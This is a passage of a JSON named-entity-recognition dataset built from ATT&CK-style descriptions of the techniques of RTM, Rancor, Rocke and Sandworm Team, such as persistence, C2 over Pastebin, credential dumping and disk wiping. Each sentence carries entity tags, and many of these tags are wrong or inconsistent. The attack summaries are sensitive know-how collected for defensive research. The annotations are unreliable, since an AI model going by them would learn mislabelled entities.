"kits,", "as", "well", "as", "online", "advertising", "network", "<code>Yandex.Direct</code>." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "I-Tool", "O", "O", "O", "O", "O", "B-Idus", "O", "O" ] }, { "tokens": [ "RTM", "has", "attempted", "to", "lure", "victims", "into", "opening", "e-mail", "attachments", "to", "execute", "malicious", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RTM", "has", "used", "Registry", "run", "keys", "to", "establish", "persistence", "for", "the", "RTM", "Trojan", "and", "other", "tools,", "such", "as", "a", "modified", "version", "of", "TeamViewer", "remote", "desktop", "software." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "RTM", "has", "used", "a", "modified", "version", "of", "TeamViewer", "and", "Remote", "Utilities", "for", "remote", "access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "I-OffAct", "O" ] }, { "tokens": [ "RTM", "has", "used", "spearphishing", "attachments", "to", "distribute", "its", "malware." ], "ner_tags": [ "B-Org", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Rancor", "has", "downloaded", "additional", "malware,", "including", "by", "using", "certutil." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Rancor", "attempted", "to", "get", "users", "to", "click", "on", "an", "embedded", "macro", "within", "a", "Microsoft", "Office", "Excel", "document", "to", "launch", "their", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Rancor", "has", "used", "<code>msiexec</code>", "to", "download", "and", "execute", "malicious", "installer", "files", "over", "HTTP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Rancor", "launched", "a", "scheduled", "task", "to", "gain", "persistence", "using", "the", "<code>schtasks", "/create", "/sc</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rancor", "has", "attached", "a", "malicious", "document", "to", "an", "email", "to", "gain", "initial", "access." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Rancor", "has", "used", "VBS", "scripts", "as", "well", "as", "embedded", "macros", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rancor", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Rancor", "has", "used", "cmd.exe", "to", "execute", "commmands." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Rancor", "has", "complied", "VBScript-generated", "MOF", "files", "into", "WMI", "event", "subscriptions", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-SamFile", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "issued", "wget", "requests", "from", "infected", "systems", "to", "the", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "installed", "an", "\"init.d\"", "startup", "script", "to", "maintain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "cleared", "log", "files", "within", "the", "/var/log/", "folder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "compiled", "malware,", "delivered", "to", "victims", "as", ".c", "files,", "with", "the", "GNU", "Compiler", "Collection", "(GCC)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "installed", "a", "cron", "job", "that", "downloaded", "and", "executed", "files", "from", "the", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "used", "Pastebin", "to", "check", "the", "version", "of", "beaconing", "malware", "and", "redirect", "to", "another", "Pastebin", "hosting", "updated", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "extracted", "tar.gz", "files", "after", "downloading", "them", "from", "a", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "used", "scripts", "which", "killed", "processes", "and", "added", "firewall", "rules", "to", "block", "traffic", "related", "to", "other", "cryptominers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "used", "scripts", "which", "detected", "and", "uninstalled", "antivirus", "software." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "modified", "/etc/ld.so.preload", "to", "hook", "libc", "functions", "in", "order", "to", "hide", "the", "installed", "dropper", "and", "mining", "software", "in", "process", "lists." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "exploited", "Apache", "Struts,", "Oracle", "WebLogic", "(CVE-2017-10271),", "and", "Adobe", "ColdFusion", "(CVE-2017-3066)", "vulnerabilities", "to", "deliver", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "deleted", "files", "on", "infected", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "downloaded", "a", "file", "\"libprocesshider\",", "which", "could", "hide", "files", "on", "the", "target", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "used", "malware", "to", "download", "additional", "malicious", "files", "to", "the", "target", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Purp", "B-Features", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "changed", "file", "permissions", "of", "files", "so", "they", "could", "not", "be", "modified." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "used", "shell", "scripts", "which", "download", "mining", "executables", "and", "saves", "them", "with", "the", "filename", "\"java\"." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "conducted", "scanning", "for", "exposed", "TCP", "port", "7001", "as", "well", "as", "SSH", "and", "Redis", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "Rocke's", "miner", "connects", "to", "a", "C2", "server", "using", "port", "51640." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "modified", "UPX", "headers", "after", "packing", "files", "to", "break", "unpackers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke's", "miner,", "\"TermsHost.exe\",", "evaded", "defenses", "by", "injecting", "itself", "into", "Windows", "processes,", "including", "Notepad.exe." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Rocke", "has", "used", "SSH", "private", "keys", "on", "the", "infected", "machine", "to", "spread", "its", "coinminer", "throughout", "a", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "can", "detect", "a", "running", "process's", "PID", "on", "the", "infected", "machine." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "used", "Python-based", "malware", "to", "install", "and", "spread", "their", "coinminer." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke's", "miner", "has", "created", "UPX-packed", "files", "in", "the", "Windows", "Start", "Menu", "Folder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "I-Tool", "I-Tool", "B-SecTeam", "B-Tool" ] }, { "tokens": [ "Rocke", "has", "looked", "for", "IP", "addresses", "in", "the", "known_hosts", "file", "on", "the", "infected", "system", "and", "attempted", "to", "SSH", "into", "them." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "distributed", "cryptomining", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "modified", "/etc/ld.so.preload", "to", "hook", "libc", "functions", "in", "order", "to", "hide", "the", "installed", "dropper", "and", "mining", "software", "in", "process", "lists." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "spread", "its", "coinminer", "via", "SSH." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Rocke", "used", "scripts", "which", "detected", "and", "uninstalled", "antivirus", "software." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke's", "miner", "has", "created", "UPX-packed", "files", "in", "the", "Windows", "Start", "Menu", "Folder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "I-Tool", "I-Tool", "B-SecTeam", "B-Tool" ] }, { "tokens": [ "Rocke", "has", "used", "uname", "-m", "to", "collect", "the", "name", "and", "information", "about", "the", "infected", "system's", "kernel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "installed", "a", "systemd", "service", "script", "to", "maintain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "changed", "the", "time", "stamp", "of", "certain", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "used", "shell", "scripts", "to", "run", "commands", "which", "would", "obtain", "persistence", "and", "execute", "the", "cryptocurrency", "mining", "malware." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rocke", "has", "executed", "wget", "and", "curl", "commands", "to", "Pastebin", "over", "the", "HTTPS", "protocol." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Rocke", "has", "used", "Pastebin,", "Gitee,", "and", "GitLab", "for", "Command", "and", "Control." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "used", "various", "third-party", "email", "campaign", "management", "services", "to", "deliver", "phishing", "emails." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "the", "Telegram", "Bot", "API", "from", "Telegram", "Messenger", "to", "send", "and", "receive", "commands", "to", "its", "Python", "backdoor.", "Sandworm", "Team", "also", "used", "legitimate", "M.E.Doc", "software", "update", "check", "requests", "for", "sending", "and", "receiving", "commands", "and", "hosted", "malicious", "payloads", "on", "putdrive.com." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "a", "large-scale", "botnet", "to", "target", "Small", "Office/Home", "Office", "(SOHO)", "network", "devices." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "I-Org", "O", "I-Org", "B-Way", "O", "O" ] }, { "tokens": [ "In", "preparation", "for", "its", "attack", "against", "the", "2018", "Winter", "Olympics,", "Sandworm", "Team", "conducted", "online", "research", "of", "partner", "organizations", "listed", "on", "an", "official", "PyeongChang", "Olympics", "partnership", "site." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Time", "I-Area", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "ROT13", "encoding,", "AES", "encryption", "and", "compression", "with", "the", "zlib", "library", "for", "their", "Python-based", "backdoor." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "distributed", "NotPetya", "by", "compromising", "the", "legitimate", "Ukrainian", "accounting", "software", "M.E.Doc", "and", "replacing", "a", "legitimate", "software", "update", "with", "a", "malicious", "one." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team's", "CredRaptor", "tool", "can", "collect", "saved", "passwords", "from", "various", "internet", "browsers." ], "ner_tags": [ "B-Idus", "B-HackOrg", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "the", "BlackEnergy", "KillDisk", "component", "to", "overwrite", "files", "on", "Windows-based", "Human-Machine", "Interfaces." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "Prestige", "ransomware", "to", "encrypt", "data", "at", "targeted", "organizations", "in", "transportation", "and", "related", "logistics", "industries", "in", "Ukraine", "and", "Poland." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "I-Idus", "I-Idus", "O", "B-Area", "O", "B-Area" ] }, { "tokens": [ "Sandworm", "Team", "exfiltrates", "data", "of", "interest", "from", "enterprise", "databases", "using", "Adminer." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Sandworm", "Team", "has", "exfiltrated", "internal", "documents,", "files,", "and", "other", "data", "from", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team's", "VBS", "backdoor", "can", "decode", "Base64-encoded", "data", "and", "save", "it", "to", "the", "%TEMP%", "folder.", "The", "group", "also", "decrypted", "received", "information", "using", "the", "Triple", "DES", "algorithm", "and", "decompresses", "it", "using", "GZip." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "the", "BlackEnergy", "KillDisk", "component", "to", "corrupt", "the", "infected", "system's", "master", "boot", "record." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "a", "tool", "to", "query", "Active", "Directory", "using", "LDAP,", "discovering", "information", "about", "usernames", "listed", "in", "AD." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "stolen", "credentials", "to", "access", "administrative", "accounts", "within", "the", "domain." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "conducted", "technical", "reconnaissance", "of", "the", "Parliament", "of", "Georgia's", "official", "internet", "domain", "prior", "to", "its", "2019", "attack." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "B-OffAct" ] }, { "tokens": [ "Sandworm", "Team", "has", "registered", "domain", "names", "and", "created", "URLs", "that", "are", "often", "designed", "to", "mimic", "or", "spoof", "legitimate", "websites,", "such", "as", "email", "login", "pages,", "online", "file", "sharing", "and", "storage", "websites,", "and", "password", "reset", "pages,", "while", "also", "hosting", "these", "items", "on", "legitimate,", "compromised", "network", "infrastructure." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "used", "malware", "to", "enumerate", "email", "settings,", "including", "usernames", "and", "passwords,", "from", "the", "M.E.Doc", "application." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "created", "email", "accounts", "that", "mimic", "legitimate", "organizations", "for", "its", "spearphishing", "operations." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "obtained", "valid", "emails", "addresses", "while", "conducting", "research", "against", "target", "organizations", "that", "were", "subsequently", "used", "in", "spearphishing", "campaigns." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Sandworm", "Team's", "research", "of", "potential", "victim", "organizations", "included", "the", "identification", "and", "collection", "of", "employee", "information." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "temporarily", "disrupted", "service", "to", "Georgian", "government,", "non-government,", "and", "private", "sector", "websites", "after", "compromising", "a", "Georgian", "web", "hosting", "provider", "in", "2019." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Area", "B-Idus", "B-Idus", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time" ] }, { "tokens": [ "Sandworm", "Team", "has", "sent", "system", "information", "to", "its", "C2", "server", "using", "HTTP." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Sandworm", "Team", "exploits", "public-facing", "applications", "for", "initial", "access", "and", "to", "acquire", "infrastructure,", "such", "as", "exploitation", "of", "the", "EXIM", "mail", "transfer", "agent", "in", "Linux", "systems." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "exploited", "vulnerabilities", "in", "Microsoft", "PowerPoint", "via", "OLE", "objects", "(CVE-2014-4114)", "and", "Microsoft", "Word", "via", "crafted", "TIFF", "images", "(CVE-2013-3906)." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "Sandworm", "Team", "defaced", "approximately", "15,000", "websites", "belonging", "to", "Georgian", "government,", "non-government,", "and", "private", "sector", "organizations", "in", "2019." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-Idus", "O", "B-Idus", "O", "O", "O", "B-Time" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "Dropbear", "SSH", "with", "a", "hardcoded", "backdoor", "password", "to", "maintain", "persistence", "within", "the", "target", "network.", "Sandworm", "Team", "has", "also", "used", "VPN", "tunnels", "established", "in", "legitimate", "software", "company", "infrastructure", "to", "gain", "access", "to", "internal", "networks", "of", "that", "software", "company's", "users." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "B-Tool", "I-Way", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "backdoors", "that", "can", "delete", "files", "used", "in", "an", "attack", "from", "an", "infected", "system." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "enumerated", "files", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "pushed", "additional", "malicious", "tools", "onto", "an", "infected", "system", "to", "steal", "user", "credentials,", "move", "laterally,", "and", "destroy", "data." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "B-Purp", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "a", "keylogger", "to", "capture", "keystrokes", "by", "using", "the", "SetWindowsHookEx", "function." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "its", "plainpwd", "tool,", "a", "modified", "version", "of", "Mimikatz,", "and", "comsvcs.dll", "to", "dump", "Windows", "credentials", "from", "system", "memory." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "B-Way", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "`move`", "to", "transfer", "files", "to", "a", "network", "share", "and", "has", "copied", "payloads--such", "as", "Prestige", "ransomware--to", "an", "Active", "Directory", "Domain", "Controller", "and", "distributed", "via", "the", "Default", "Domain", "Group", "Policy", "Object." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "tricked", "unwitting", "recipients", "into", "clicking", "on", "spearphishing", "attachments", "and", "enabling", "malicious", "macros", "embedded", "within", "files." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "tricked", "unwitting", "recipients", "into", "clicking", "on", "malicious", "hyperlinks", "within", "emails", "crafted", "to", "resemble", "trustworthy", "senders." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "developed", "malware", "for", "its", "operations,", "including", "malicious", "mobile", "applications", "and", "destructive", "malware", "such", "as", "NotPetya", "and", "Olympic", "Destroyer." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Tool", "B-HackOrg" ] }, { "tokens": [ "Sandworm", "Team", "masqueraded", "malicious", "installers", "as", "Windows", "update", "packages", "to", "evade", "defense", "and", "entice", "users", "to", "execute", "binaries." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "avoided", "detection", "by", "naming", "a", "malicious", "binary", "explorer.exe." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "`ntdsutil.exe`", "to", "back", "up", "the", "Active", "Directory", "database,", "likely", "for", "credential", "access." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "intercepter-NG", "to", "sniff", "passwords", "in", "network", "traffic." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "port", "6789", "to", "accept", "connections", "on", "the", "group's", "SSH", "server." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "Base64", "encoding", "within", "malware", "variants." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "PowerShell", "scripts", "to", "run", "a", "credential", "harvesting", "tool", "in", "memory", "to", "evade", "defenses." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team's", "BCS-server", "tool", "can", "create", "an", "internal", "proxy", "server", "to", "redirect", "traffic", "from", "the", "adversary-controlled", "C2", "to", "internal", "servers", "which", "may", "not", "be", "connected", "to", "the", "internet,", "but", "are", "interconnected", "locally." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "remote", "administration", "tools", "or", "remote", "industrial", "control", "system", "client", "software", "for", "execution", "and", "to", "maliciously", "release", "electricity", "breakers." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Sandworm", "Team", "has", "used", "a", "tool", "to", "query", "Active", "Directory", "using", "LDAP,", "discovering", "information", "about", "computers", "listed", "in", "AD." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sandworm", "Team", "used", "a", "backdoor", "which", "could", "execute", "a", "supplied", "DLL", "using", "rundll32.exe." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Sandworm", "Team", "has", "copied", "payloads", "to", "the", "`ADMIN$`", "share", "of", "remote", "systems", "and", "run", "<code>net", "use</code>", "to", "connect", "to", "network", "shares." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", 